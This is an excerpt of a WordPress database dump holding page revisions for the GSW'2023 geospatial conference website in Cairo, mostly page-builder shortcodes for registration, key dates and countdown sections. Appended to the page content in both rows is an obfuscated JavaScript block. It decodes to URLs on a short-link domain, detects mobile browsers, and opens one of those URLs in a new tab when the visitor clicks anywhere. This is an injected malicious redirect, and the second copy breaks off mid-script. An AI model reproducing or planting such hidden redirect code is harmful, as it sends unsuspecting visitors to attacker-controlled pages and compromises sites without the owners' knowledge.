-o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:59:11','2022-11-09 18:59:11','',3066,'https://gsw2023.com/?p=3196',0,'revision','',0),
(3197,1,'2022-11-09 19:02:53','2022-11-09 19:02:53','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1668020567939{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1668020534468{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 